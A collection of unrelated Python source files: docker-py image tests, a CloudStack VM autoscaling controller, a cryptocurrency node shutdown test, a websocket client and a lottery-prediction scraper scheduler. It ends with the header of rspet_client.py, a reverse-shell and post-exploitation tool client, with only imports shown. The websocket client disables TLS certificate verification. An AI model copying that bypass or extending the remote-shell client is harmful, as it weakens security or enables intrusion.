assert result['SpaceReclaimed'] > 0
assert 'hello-world:latest' in [
img.get('Untagged') for img in result['ImagesDeleted']
]
assert img_id in [
img.get('Deleted') for img in result['ImagesDeleted']
]
class SaveLoadImagesTest(BaseAPIIntegrationTest):
@requires_api_version('1.23')
def test_get_image_load_image(self):
with tempfile.TemporaryFile() as f:
stream = self.client.get_image(TEST_IMG)
for chunk in stream:
f.write(chunk)
f.seek(0)
result = self.client.load_image(f.read())
success = False
result_line = f'Loaded image: {TEST_IMG}\n'
for data in result:
print(data)
if 'stream' in data:
if data['stream'] == result_line:
success = True
break
assert success is True
@requires_api_version('1.30')
class InspectDistributionTest(BaseAPIIntegrationTest):
def test_inspect_distribution(self):
data = self.client.inspect_distribution('busybox:latest')
assert data is not None
assert 'Platforms' in data
assert {'os': 'linux', 'architecture': 'amd64'} in data['Platforms']
|
controller.py
|
#! /usr/bin/env python3
import os
import re
import time
import json
import logging
import pickle
import threading
import requests
from argparse import ArgumentParser
from configparser import ConfigParser
from pathlib import Path
from tempfile import NamedTemporaryFile
from cs import read_config, CloudStack
import catalog
#
CONFIG_FILE = "/auto-scaling/cloudstack.ini"
STATUS_FILE = "/auto-scaling/autoscaling.status"
INTERVAL = 15 # 15 sec
PERIOD = 180 # 180 sec
USAGE_COUNT = PERIOD / INTERVAL
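# Derived value: 180 s / 15 s = 12 usage samples per averaging window; the
# collector and the controller below both size their sample lists from it.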
VM_PREFIX = "asvm"
AGENT_PORT = 8585
#
logger = None
#
def get_logger():
global logger
if not logger:
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(message)s'))
logger = logging.getLogger()
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
return logger
#
def print_debug(text):
print_method = print if not logger else logger.debug
for line in text.split("\n"):
print_method("[DEBUG] {}".format(line))
#
def print_info(text):
print_method = print if not logger else logger.info
for line in text.split("\n"):
print_method(line)
#
class CloudStackApiClient:
_MAX_RETRY = 180
_ASYNC_INTERVAL = 5
_INSTANCE = None
@classmethod
def get_instance(cls, zoneid, debug=False):
if cls._INSTANCE is None or ( cls._INSTANCE and cls._INSTANCE.zoneid != zoneid ):
cls._INSTANCE = cls(zoneid, debug)
return cls._INSTANCE
def __init__(self, zoneid, debug):
self.zoneid = zoneid
self._debug = debug
self._config = read_config()
self._cs = CloudStack(**self._config)
self._vms = {}
self._zones = {}
self._lbs = {}
self._templates = {}
self._offerings = {}
self._networks = {}
def _print_debug(self, text):
if self._debug:
print_debug(text)
def _dump(self, data=None):
if self._debug and data:
print_debug(json.dumps(data, sort_keys=True, indent=2))
def queryAsyncJobResult(self, jobid):
for i in range(0, self._MAX_RETRY):
job = self._cs.queryAsyncJobResult(jobid=jobid)
if job['jobstatus'] == 1:
self._dump(job)
return job
self._print_debug("wait for job: {} times".format(i + 1))
time.sleep(self._ASYNC_INTERVAL)
return None
def _list(self, api_name, params):
results = getattr(self._cs, api_name)(**params)
self._dump(results)
section = re.sub('^list(.+)s$', lambda m: m.group(1), api_name).lower()
if section in results:
return results[section]
else:
return []
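    # A sketch of the mapping the regex above performs (not an exhaustive list):
    # 'listVirtualMachines' -> response section 'virtualmachine',
    # 'listLoadBalancerRules' -> 'loadbalancerrule', 'listZones' -> 'zone'.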
def listZones(self):
return self._list("listZones", { "zoneid": self.zoneid })
def listLoadBalancerRules(self):
return self._list("listLoadBalancerRules", { "zoneid": self.zoneid })
def listNetworks(self):
return self._list("listNetworks", { "zoneid": self.zoneid })
def listTemplates(self):
return self._list("listTemplates", { "zoneid": self.zoneid, "templatefilter": "self" })
def listServiceOfferings(self):
return self._list("listServiceOfferings", {})
def listVirtualMachines(self):
return self._list("listVirtualMachines", { "zoneid": self.zoneid })
def deployVirtualMachine(self, name, templateid, offeringid, networkids):
result = self._cs.deployVirtualMachine(
zoneid=self.zoneid,
serviceofferingid=offeringid,
templateid=templateid,
networkids=",".join(networkids),
name=name,
displayname=name
)
job = self.queryAsyncJobResult(result['jobid'])
if job is None or "jobresult" not in job or "virtualmachine" not in job["jobresult"]:
return None
uuid = job['jobresult']['virtualmachine']['id']
self._vms[uuid] = { 'uuid': uuid, 'name': name }
return self._vms[uuid]
def destroyVirtualMachine(self, vmid):
result = self._cs.destroyVirtualMachine(id=vmid, expunge=True)
self.queryAsyncJobResult(result['jobid'])
def assignToLoadBalancerRule(self, lbid, vmid):
result = self._cs.assignToLoadBalancerRule(id=lbid, virtualmachineids=vmid)
self.queryAsyncJobResult(result['jobid'])
def removeFromLoadBalancerRule(self, lbid, vmid):
result = self._cs.removeFromLoadBalancerRule(id=lbid, virtualmachineids=vmid)
self.queryAsyncJobResult(result['jobid'])
def _get_data(self, uuid, cache, method, params, force=False):
if uuid not in cache or force:
            cache.clear()
for x in getattr(self, method)():
cache[x['id']] = { p[0]:x[p[1]] for p in params }
if uuid in cache:
return cache[uuid]
return None
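    # For example, get_vm_data(uuid) below calls listVirtualMachines once, keeps
    # only {'name': ..., 'uuid': ...} per entry in self._vms, and serves later
    # lookups from that cache unless force=True triggers a refresh.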
def get_vm_data(self, uuid, force=False):
return self._get_data(
uuid=uuid, cache=self._vms, method="listVirtualMachines",
params=(('name', 'name'), ('uuid', 'id')),
force=force
)
def get_zone_data(self, uuid, force=False):
return self._get_data(
uuid=uuid, cache=self._zones, method="listZones",
params=(('name', 'name'), ('uuid', 'id')),
force=force
)
def get_lb_data(self, uuid, force=False):
return self._get_data(
uuid=uuid, cache=self._lbs, method="listLoadBalancerRules",
params=(('name', 'name'), ('uuid', 'id')),
force=force
)
def get_network_data(self, uuid, force=False):
return self._get_data(
uuid=uuid, cache=self._networks, method="listNetworks",
params=(('name', 'name'), ('uuid', 'id')),
force=force
)
def get_template_data(self, uuid, force=False):
return self._get_data(
uuid=uuid, cache=self._templates, method="listTemplates",
params=(('name', 'name'), ('uuid', 'id')),
force=force
)
def get_offering_data(self, uuid, force=False):
return self._get_data(
uuid=uuid, cache=self._offerings, method="listServiceOfferings",
params=(('name', 'name'), ('uuid', 'id')),
force=force
)
def create_vm(self, name, lbid, templateid, offeringid, networkids):
vm = self.deployVirtualMachine(name, templateid, offeringid, networkids)
if vm:
self.assignToLoadBalancerRule(lbid, vm['uuid'])
return vm
def remove_vm(self, vmid, lbid):
self.removeFromLoadBalancerRule(lbid, vmid)
self.destroyVirtualMachine(vmid)
#
class AutoScalingUsageCollector(threading.Thread):
_TIMEOUT = 2
def __init__(self, name, endpoint, info, usage, interval=INTERVAL, usage_count=USAGE_COUNT):
super().__init__(name=name)
self._event = threading.Event()
self._endpoint = endpoint
self._info = info
self._interval = interval
self._usage = usage
self._usage_count = usage_count
@property
def event(self):
return self._event
@property
def usage(self):
return self._usage
@property
def active(self):
return self._info['active']
@property
def failcount(self):
return self._info['failcount']
def run(self):
interval = 0
while not self._event.wait(timeout=interval):
begin_time = time.time()
usage = None
try:
result = requests.get(self._endpoint, timeout=self._TIMEOUT)
usage = round(result.json()['usage'], 1)
self._info['active'] = True
self._info['failcount'] = 0
            except Exception:
self._info['failcount'] += 1
if self._usage_count <= self._info['failcount']:
self._info['active'] = False
self._usage.append([time.strftime('%H:%M:%S', time.gmtime(begin_time)), usage])
if len(self._usage) > self._usage_count:
self._usage.pop(0)
interval = self._interval - ( time.time() - begin_time )
if interval < 0:
interval = 0
#
class AutoScalingData:
def __init__(self, file, debug=False):
self._file = file
self._debug = debug
self.data = None
def _print_debug(self, text):
if self._debug:
print_debug(text)
def dump(self, data=None):
if data is None:
data = self.data
if self._debug and data:
print_debug(json.dumps(data, sort_keys=True, indent=2))
#
class AutoScalingConfig(AutoScalingData):
# 0:Section, 1:OptionName, (2-0:Type, 2-1:Required, 2-2:Judge)
_SCHEMA = {
'cloudstack' : {
'endpoint' : (str, True, None),
'key' : (str, True, None),
'secret' : (str, True, None),
},
'tenant' : dict(**{
'zone_uuid' : (str, True, '_judge_zone'),
'lb_rule_uuid' : (str, True, '_judge_lb'),
'template_uuid' : (str, True, '_judge_template'),
'serviceoffering_uuid': (str, True, '_judge_offering'),
'network1_uuid' : (str, True, '_judge_network'),
}, **{ f'network{i}_uuid' : (str, False, '_judge_network') for i in range(2, 10) }),
'vm' : {
'vm1_uuid' : (str, True, None),
},
'autoscaling': {
'autoscaling_vm' : (int, True, None),
'upper_limit' : (float, True, None),
'lower_limit' : (float, True, None),
},
}
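    # Reading the schema above: the 'upper_limit' entry, for instance, means
    # option "upper_limit" in section [autoscaling], parsed as float, required,
    # with no extra validation; entries whose third field names a _judge_*
    # method are additionally verified against the CloudStack API after loading.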
def __init__(self, file, debug=False):
super().__init__(file, debug)
self._mtime = 0
self._client = None
self._ready = False
def _judge_zone(self, uuid):
return self._client.get_zone_data(uuid) is not None
def _judge_lb(self, uuid):
return self._client.get_lb_data(uuid) is not None
def _judge_network(self, uuid):
return self._client.get_network_data(uuid) is not None
def _judge_template(self, uuid):
return self._client.get_template_data(uuid) is not None
def _judge_offering(self, uuid):
return self._client.get_offering_data(uuid) is not None
def _judge(self):
if self.data is None:
self._print_debug("{} is empty".format(self._file))
return False
for section, params in self._SCHEMA.items():
if section not in self.data:
self._print_debug("Section {} is required".format(section))
return False
for name, options in params.items():
if options[1]:
if name not in self.data[section]:
self._print_debug("Option {} => {} is required".format(section, name))
return False
self._client = CloudStackApiClient.get_instance(
zoneid=self.data['tenant']['zone_uuid'],
debug=self._debug
)
for section, params in self._SCHEMA.items():
for name, options in params.items():
if options[2]:
if name not in self.data[section]:
continue
if not getattr(self, options[2])(self.data[section][name]):
self._print_debug("Option {} => {} is incorrect".format(section, name))
return False
return True
def load(self):
if not Path(self._file).is_file():
self._print_debug("{} does not exist".format(self._file))
self._ready = False
return False
current_mtime = os.path.getmtime(self._file)
if current_mtime == self._mtime:
self._print_debug("{} does not need to re-load".format(self._file))
return False
self._print_debug("{} loaded".format(self._file))
conf = ConfigParser()
conf.read(self._file)
f = {
None : lambda c, s, n: c.get(s, n),
str : lambda c, s, n: c.get(s, n),
int : lambda c, s, n: c.getint(s, n),
float: lambda c, s, n: c.getfloat(s, n),
bool : lambda c, s, n: c.getboolean(s, n),
}
self.data = {}
for section in conf.sections():
self.data[section] = {}
for name in conf.options(section):
option_type = None
if section in self._SCHEMA and name in self._SCHEMA[section]:
option_type = self._SCHEMA[section][name][0]
self.data[section][name] = f[option_type](conf, section, name)
self.dump()
self._ready = self._judge()
self._mtime = current_mtime
return True
@property
def ready(self):
return self._ready
@property
def tenant_networks(self):
networks = []
for i in range(1, 10):
name = f'network{i}_uuid'
if name in self.data['tenant']:
networks.append(self.data['tenant'][name])
return networks
#
class AutoScalingStatus(AutoScalingData):
_PICKLE_VERSION = 3
_MAX_RETRY = 120
_RETRY_INTERVAL = 5
def __init__(self, file, debug=False):
super().__init__(file, debug)
self._agents = {}
self._event_save = None
def __del__(self):
for agent in self._agents.values():
agent.event.set()
def _start_collector(self, uuid, name, info, usage, port=AGENT_PORT):
if uuid not in self._agents:
self._agents[uuid] = AutoScalingUsageCollector(
name, "http://{}:{}/".format(name, port), info, usage)
if not self._agents[uuid].is_alive():
self._agents[uuid].start()
def _stop_collector(self, uuid):
if uuid in self._agents:
self._agents.pop(uuid).event.set()
def _wait_collector(self, uuid):
for i in range(0, self._MAX_RETRY):
if self._agents[uuid].active:
return True
time.sleep(self._RETRY_INTERVAL)
return False
def init_status(self):
for uuid in self.data['vm']:
self.data['status'][uuid][:] = []
def remove_vm(self, uuid):
self._stop_collector(uuid)
self.data['vm'].pop(uuid)
self.data['status'].pop(uuid)
def add_vm(self, uuid, name, autoscaling=False, wait=False):
self.data['vm'][uuid] = {
'uuid' : uuid,
'name' : name,
'autoscaling': autoscaling,
'active' : False,
'failcount' : 0
}
self.data['status'][uuid] = []
self._start_collector(uuid, name, self.data['vm'][uuid], self.data['status'][uuid])
if wait:
if not self._wait_collector(uuid):
self.remove_vm(uuid)
return False
return True
def load(self):
self.data = {
'vm' : {},
'status' : {},
'average': 0.0,
'info' : { 'code': 200, 'message': None },
}
if Path(self._file).is_file():
with open(self._file, 'rb') as fd:
data = pickle.load(fd)
if data and 'vm' in data:
for uuid, vm in data['vm'].items():
self.add_vm(vm['uuid'], vm['name'], vm['autoscaling'])
self.dump()
return True
def save(self):
path = Path(self._file)
tmpfile = None
with NamedTemporaryFile(mode='wb', dir=path.parent, prefix=path.name, delete=False) as f:
tmpfile = f.name
pickle.dump(self.data, f, protocol=self._PICKLE_VERSION)
if tmpfile:
os.rename(tmpfile, self._file)
self.dump()
@property
def is_constant_save(self):
return self._event_save is not None
def start_constant_save(self):
def run():
while not self._event_save.wait(timeout=15):
self.save()
self._event_save = None
if not self.is_constant_save:
thread = threading.Thread(target=run)
self._event_save = threading.Event()
thread.start()
def stop_constant_save(self):
if self.is_constant_save:
self._event_save.set()
def set_info(self, code, **kwargs):
c = catalog.CATALOG[code]
self.data['info'] = {
'code': code,
'message': c.format(**kwargs) if c else c
}
#
class AutoScalingController:
def __init__(self, config_file, status_file, prefix=VM_PREFIX, debug=False):
self._debug = debug
self._client = None
self._prefix = prefix
self._config = AutoScalingConfig(config_file, self._debug)
self._status = AutoScalingStatus(status_file, self._debug)
def _print_debug(self, text):
if self._debug:
print_info("[DEBUG] {}".format(text))
def _get_cloudstack(self):
self._client = CloudStackApiClient.get_instance(
zoneid=self._config.data['tenant']['zone_uuid'],
debug=self._debug
)
def _available_vm(self):
return {
uuid: v for uuid, v in self._status.data['vm'].items()
if v is not None and v['active']
}
def _autoscaling_vm(self):
return [
v for uuid, v in self._status.data['vm'].items()
if v is not None and v['autoscaling']
]
def _stable_vm(self):
return [
v for uuid, v in self._status.data['vm'].items()
if v is not None and not v['autoscaling']
]
def load_config(self):
updated = self._config.load()
self._print_debug("ready={}, updated={}".format(self._config.ready, updated))
if not self._config.ready:
if self._status.is_constant_save:
self._status.stop_constant_save()
self._status.set_info(catalog.ERROR_CONFIG)
self.save_status()
return False
if updated:
self._get_cloudstack()
# new stable VM
stables = self._config.data['vm'].values()
for uuid in stables:
if uuid in self._status.data['vm']:
continue
vm = self._get_vm_data(uuid)
if vm:
self._status.add_vm(**vm, autoscaling=False)
# leave stable VM
for vm in self._stable_vm():
if vm['uuid'] not in stables:
self._status.remove_vm(vm['uuid'])
self._status.set_info(catalog.OK)
self._status.start_constant_save()
return True
def load_status(self):
self._status.load()
def save_status(self):
self._status.save()
def create_vm(self):
vms = [ v['name'] for v in self._autoscaling_vm() ]
if self._config.data['autoscaling']['autoscaling_vm'] <= len(vms):
return
for i in range(1, 100):
name = "{}{:02d}".format(self._prefix, i)
if name not in vms:
break
self._status.set_info(catalog.OK_CREATING, name=name)
vm = self._client.create_vm(
name,
self._config.data['tenant']['lb_rule_uuid'],
self._config.data['tenant']['template_uuid'],
self._config.data['tenant']['serviceoffering_uuid'],
self._config.tenant_networks
)
if vm is None:
self._status.set_info(catalog.ERROR_CREATE, name=name)
print_info("Error: Failed to create a new vm: name={}".format(name))
return
uuid = vm['uuid']
if self._status.add_vm(**vm, autoscaling=True, wait=True):
self._status.init_status()
self._status.set_info(catalog.OK_CREATED, name=name)
print_info("Create new vm: name={}, uuid={}".format(name, uuid))
else:
self._client.remove_vm(uuid, self._config.data['tenant']['lb_rule_uuid'])
def remove_vm(self, uuid=None):
if uuid is None:
vms = sorted(self._autoscaling_vm(), key=lambda x: x['name'])
if len(vms) == 0:
return
for vm in vms:
if not vm['active']:
uuid = vm['uuid']
name = vm['name']
break
else:
name = vms[-1]['name']
uuid = vms[-1]['uuid']
else:
name = self._status.data['vm'][uuid]['name']
self._status.set_info(catalog.OK_REMOVING, name=name)
self._client.remove_vm(uuid, self._config.data['tenant']['lb_rule_uuid'])
self._status.remove_vm(uuid)
self._status.init_status()
self._status.set_info(catalog.OK_REMOVED, name=name)
print_info("remove the vm: name={}, uuid={}".format(name, uuid))
def clean_vm(self):
for vm in self._autoscaling_vm():
if not vm['active']:
self.remove_vm(vm['uuid'])
def _get_vm_data(self, uuid):
vm = self._client.get_vm_data(uuid)
print_info("uuid={}, data={}".format(uuid, vm))
return vm
def _get_vm_usage(self, uuid):
usage = [ x for x in self._status.data['status'][uuid] if x[1] is not None ]
print_info("uuid={}, usage={}".format(uuid, usage))
return usage
def calculate_usage(self):
total_usage = 0.0
total_count = 0
vms = self._available_vm()
for uuid, vm in vms.items():
target = self._get_vm_usage(uuid)
total_count += len(target)
total_usage += sum([ x[1] for x in target ])
if total_count == 0:
self._status.set_info(catalog.OK_NO_DATA)
self._print_debug("There's not any usage")
return
average = round(total_usage / total_count, 1)
self._status.set_info(catalog.OK_AVERAGE, average=average)
if total_count == ( USAGE_COUNT * len(vms) ):
if average >= self._config.data['autoscaling']['upper_limit']:
self.create_vm()
if average <= self._config.data['autoscaling']['lower_limit']:
self.remove_vm()
self._status.data['average'] = average
def run(self):
self.load_status()
while True:
begin_time = time.time()
if self.load_config():
self.clean_vm()
self.calculate_usage()
interval = INTERVAL - ( time.time() - begin_time )
if interval > 0:
time.sleep(interval)
if __name__ == '__main__':
# Options
parser = ArgumentParser()
parser.add_argument("-d", "--debug", action="store_true", default=False, help="Debug mode")
parser.add_argument("-c", "--config", type=str, default=CONFIG_FILE, help="Config file")
parser.add_argument("-s", "--status", type=str, default=STATUS_FILE, help="Status file")
parser.add_argument("-P", "--prefix", type=str, default=VM_PREFIX, help="VM prefix. Default: {}".format(VM_PREFIX))
args = parser.parse_args()
#
logger = get_logger()
try:
# Run AutoScalingController
controller = AutoScalingController(args.config, args.status, args.prefix, args.debug)
controller.run()
except KeyboardInterrupt:
del controller
time.sleep(0.1)
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Copyright (c) 2021 The Vivuscoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test vivuscoind shutdown."""
from test_framework.test_framework import VivuscoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(VivuscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
subscribe_client.py
|
import ssl
import threading
import time
import websocket # pip3 install websocket_client
websocket.enableTrace(True)
def on_wss_msg(evt):
print(evt)
class SubscribeClient(websocket.WebSocketApp):
def __init__(self, url, on_wss_open, on_wss_msg):
self.url = url
self.reconnect_intv_sec = 60
super().__init__(url=url,
on_open=on_wss_open,
on_message=on_wss_msg,
on_error=self.on_wss_error,
on_close=self.on_wss_close)
def on_wss_open(self):
print(self.__class__.__name__ + ': on_wss_open')
def on_wss_cont_message(self, msg, cont):
print(self.__class__.__name__ + ': on_wss_cont_message')
def on_wss_error(self, evt):
print(self.__class__.__name__ + ': on_wss_error: msg = ' + str(evt))
print(evt)
def on_wss_close(self):
print(self.__class__.__name__ + ': on_wss_close')
def do_start(self):
try:
while True:
print('Starting SubscribeClient url = ' + self.url)
self.run_forever(ping_timeout=30, sslopt={"cert_reqs": ssl.CERT_NONE})
print(f'Sleep {self.reconnect_intv_sec} seconds and connect again....')
time.sleep(self.reconnect_intv_sec)
except Exception as e:
print('SubscribeClient: run_forever exception ' + str(e))
def start(self):
threading.Thread(target=self.do_start).start()
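# Minimal usage sketch (the URL below is a placeholder, not a real endpoint):
# client = SubscribeClient('wss://example.invalid/stream',
#                          on_wss_open=None, on_wss_msg=on_wss_msg)
# client.start()  # runs run_forever() in a background thread and reconnects
#                 # every reconnect_intv_sec seconds after the socket closes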
|
start.py
|
# -*- coding:utf-8 -*-
import gevent
from gevent import monkey
monkey.patch_all()
import os
from settings import DAYS_DICT, avoid_experts_db, LOTTERY_DICT_2, DATA_FILE, \
miss_urls_db, SETUP_FILE, BASE_DIR, saved_db, REAL, SETUP_TEMPLATE
os.chdir(BASE_DIR)
import signal
from multiprocessing import Process
from dataB import auto_begin as abg
from proxy.clear_proxies import clear_proxies_db
from proxy.get_proxy import GetProxies
from tools.send_mail import SendMail
from tools.auto_analyse_data import AnalyseData
from tools.common import *
from tools.auto_check_articles_list import CheckArticlesList as CAL
from tools.logger import Logger
from dataP.auto_begin import ExpertDataBegin as EB
logger = Logger(logger=__name__).getlog()
process_flag = 0
normal_main_process_time_delta = 1800
abnormal_main_process_time_delta = 300
hostname = os.popen('hostname').read()[:-1]
def get_work_times():
content = get_json_content(SETUP_FILE)
common_times = content['common_actions_time']
real_times = content['real_actions_time']
test_times = content['test_actions_time']
se_times = content['start_end_times']
actions_times = real_times if REAL == 1 else test_times
actions_times.update(se_times)
actions_times.update(common_times)
return actions_times
def start_ctrl(lottery, now_stage, work_times):
    logger.info('Work shift started!')
    data_file = DATA_FILE % (time.strftime('%Y-%m-%d'), lottery, now_stage)
    sm = SendMail(data_file)
    logger.info('Host: %s Lottery: %s Stage: %s Data file: %s' % (hostname, lottery, now_stage, data_file))
    sm.send_flush(now_time() + ' Host: %s, Lottery: %s, Stage: %s Data file: %s' % (hostname, lottery, now_stage, data_file))
ad = AnalyseData(lottery, now_stage, data_file)
global process_flag
process_flag = 1
while 1:
bg = EB(lottery)
for key in work_times:
if time.strftime('%H:%M') == work_times[key]:
if key == "end_time": # 今天结束了
logger.info('下班,明天是个好日子!!')
process_flag = 0
sm.send_flush('%s %s' % (now_time(), hostname) + ' 下班,明天是个好日子!!')
os.kill(os.getpid(), signal.SIGKILL)
# 开始获取代理
if key == 'get_lotteries_data':
logger.info('开始获取往期的开奖数据。')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 开始获取往期的开奖数据。')
bag = abg.Begin(lottery) # 获取往期的开奖数据
bag.begin()
if key == 'get_proxies':
logger.info('开始获取代理。')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 开始获取代理!')
clear_proxies_db()
gp = GetProxies()
gp.start()
# 开始获取本期的专家
if key == 'get_the_next_stage_experts':
logger.info('开始获取下期专家!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 开始获取下期专家!')
bg.get_experts()
# 获取本期的所有专家的预测数据url列表
if key == 'get_the_next_stage_experts_articles_list':
logger.info('开始获取下期专家列表!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 开始获取下期专家列表!')
bg.get_predict_urls()
# 再次开始获取本期的专家
if key == 'get_the_next_stage_experts_again':
logger.info('再次获取下期专家!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 再次获取下期专家!')
bg.get_experts()
# 获取本期的所有专家的预测数据url列表-补救措施
if key == 'get_the_next_stage_experts_articles_list_again':
logger.info('再次获取下期专家的预测文章列表!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 再次获取下期专家的预测文章列表!')
bg.get_predict_urls()
# 获取本期的所有专家的预测数据url列表-补救措施
if key == 'get_the_next_stage_experts_articles_list_third':
logger.info('三次获取下期专家的预测文章列表!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 三次获取下期专家的预测文章列表!')
bg.begin_get_predict_urls(1)
# 获取当前待开奖的预测数据
if key == 'get_the_next_stage_experts_all_predict_data':
logger.info('开始获取专家的预测数据!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 开始获取专家的预测数据!')
bg.get_predict_data()
# 获取当前待开奖的预测数据-补救措施
if key == 'get_the_next_stage_experts_all_predict_data_again':
logger.info('再次获取专家的所有预测数据!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 再次获取专家的所有预测数据!')
bg.get_predict_data()
if key == 'get_proxies_again':
logger.info('再次获取代理。')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 开始获取代理!')
clear_proxies_db()
gp = GetProxies()
gp.start()
if key == 'check_the_next_stage_experts_articles_list':
logger.info('检查所有专家的文章列表是否有漏爬!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 检查所有专家的文章列表是否有漏爬!')
cal = CAL(LOTTERY_DICT_2[lottery], now_stage)
cal.start_check()
bg.get_predict_urls(1)
if key == 'get_the_next_stage_experts_articles_list_fourth':
logger.info('四次获取下期专家的预测文章列表。')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 四次获取下期专家的预测文章列表!')
bg.begin_get_predict_urls(1)
if key == 'get_the_next_stage_experts_articles_list_fifth':
logger.info('五次获取下期专家的预测文章列表!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 五次获取下期专家的预测文章列表!')
bg.begin_get_predict_urls(1)
if key == 'get_the_next_stage_experts_all_predict_data_third':
logger.info('三次获取专家的预测数据!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 三次获取专家的预测数据!')
bg.get_predict_data()
if key == 'get_the_next_stage_experts_all_predict_data_fourth':
logger.info('四次获取专家的预测数据!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 四次获取专家的预测数据!')
bg.get_predict_data()
# 获取当前期的专家列表,并记入DATA_FILE
if key == 'get_the_next_stage_experts_list':
logger.info('开始分析下期的“预测专家列表”!')
sm.send_flush('%s %s %s' % (now_time(), hostname, data_file) + ' 开始分析下期的“预测专家列表”!')
ad.start_analyse()
# 获取当前期的专家们的预测数据
if key == 'get_the_next_stage_experts_predict_data':
logger.info('开始获取下期的“专家预测数据”!')
sm.send_flush('%s %s %s' % (now_time(), hostname, data_file) + ' 开始获取下期的“专家预测数据”!')
ad.get_the_next_experts_predict_kill_data()
# 开始发送邮件
if key == 'send_mail':
logger.info('发送邮件!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 发送邮件!')
sm.send_mail()
# 开始发送第二次确认邮件
if key == 'send_mail_again':
logger.info('发送确认邮件!')
sm.send_flush('%s %s' % (now_time(), hostname) + ' 发送确认邮件!')
sm.send_mail()
if key == 'clear_database':
logger.info('开始清除数据库:%s!' %
([lpdb[lottery + '_experts'], avoid_experts_db, miss_urls_db['articles_list']]))
try:
lpdb[lottery + '_experts'].drop()
lpdb[lottery + '_right_location'].drop()
saved_db['the_next_stage_saved_predict_urls'].drop()
avoid_experts_db.drop()
remove_browser_tmp('/tmp')
miss_urls_db['articles_list'].drop()
logger.info('成功清除数据库:%s!' %
([lpdb[lottery + '_experts'], avoid_experts_db, miss_urls_db['articles_list']]))
sm.send_flush('%s %s' % (now_time(), hostname) + ' 开始清除数据库完成!!')
except Exception as e:
logger.error(e)
time.sleep(15) # 为了防止某些操作一分钟内执行了两次
logger.info('休息中...')
time.sleep(50)
def start():
if not os.path.exists(os.path.dirname(DATA_FILE)):
os.mkdir(os.path.dirname(DATA_FILE))
while 1:
work_times = get_work_times()
logger.info(work_times)
start_time = work_times['start_time']
end_time = work_times['end_time']
avoid_whole_point()
today = int(time.strftime("%w"))
if today in [1, 3, 6]:
lottery = 'dlt'
elif today in [0, 2, 4]:
lottery = 'ssq'
else:
lottery = 'ggl'
        logger.info('Today is weekday %s, lottery draw: %s!!!' % (DAYS_DICT[time.strftime('%w')], LOTTERY_DICT_2[lottery]))
if lottery != 'ggl':
if not process_flag and (start_time[:2] <= time.strftime('%H') and time.strftime('%H:%M') <= end_time):
now_stage = get_the_next_stage(lottery)
p1 = Process(target=start_ctrl, args=(lottery, now_stage, work_times))
p1.start()
p1.join()
if not process_flag:
                logger.info('The worker has already gone off duty!')
if process_flag:
time.sleep(normal_main_process_time_delta)
else:
time.sleep(abnormal_main_process_time_delta)
    # TODO: remove the folders created by selenium in the tmp directory
def first_run(data):
    # TODO
    # 1. Various checks: required libraries installed, software environment, current work_dir
    # 2. Copy setup_template.json -> setup.json
    # 3. Prompt the user to set the mail password and the sender/receivers
    for lottery in ['ssq', 'dlt']:
        bag = abg.Begin(lottery)  # Fetch historical draw data
bag.begin()
mail_sender, mail_password = set_mail_sender()
mail_receivers = set_mail_receivers()
cjw_account, cjw_password = set_cjw_account()
data['mail_options']['sender'] = mail_sender
data['mail_options']['password'] = mail_password
data['mail_options']['receivers'] = mail_receivers
data['cjw_options']['account'] = cjw_account
data['cjw_options']['password'] = cjw_password
data['run_times'] = 1
with open(SETUP_FILE, 'w', encoding='utf-8') as f:
json.dump(data, f)
def other_test():
while 1:
bg = EB('ssq')
bg.get_experts()
bg.get_predict_urls(1)
bg.get_predict_data()
time.sleep(2400)
if __name__ == '__main__':
if not os.path.exists(SETUP_FILE):
if os.name == 'nt':
os.system('xcopy %s %s' % (SETUP_TEMPLATE, SETUP_FILE))
else:
os.system('cp -f %s %s' % (SETUP_TEMPLATE, SETUP_FILE))
with open(SETUP_FILE, 'r', encoding='utf-8') as f:
content = json.load(f)
    is_first_run = content['run_times']  # If run_times in setup.json is 0, a first crawl is assumed to be needed
if not is_first_run:
first_run(content)
start()
|
rspet_client.py
|
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
"""rspet_client.py: RSPET's Client-side script."""
from __future__ import print_function
from sys import exit as sysexit, argv
from time import sleep
from subprocess import Popen, PIPE
from multiprocessing import Process, freeze_support
from socket import socket, IPPROTO_UDP, IPPROTO_RAW, SOCK_DGRAM, SOCK_STREAM, SOCK_RAW, AF_INET
from socket import error as sock_error
from socket import SHUT_RDWR
import ssl
__author__ = "Kolokotronis Panagiotis"
__copyright__ = "Copyright 2016, Kolokotronis Panagiotis"
__credits__ = ["Kolokotronis Panagiotis", "Dimitris Zervas", "Lain Iwakura"]
__license__ = "MIT"
__version__ = "0.3.1"
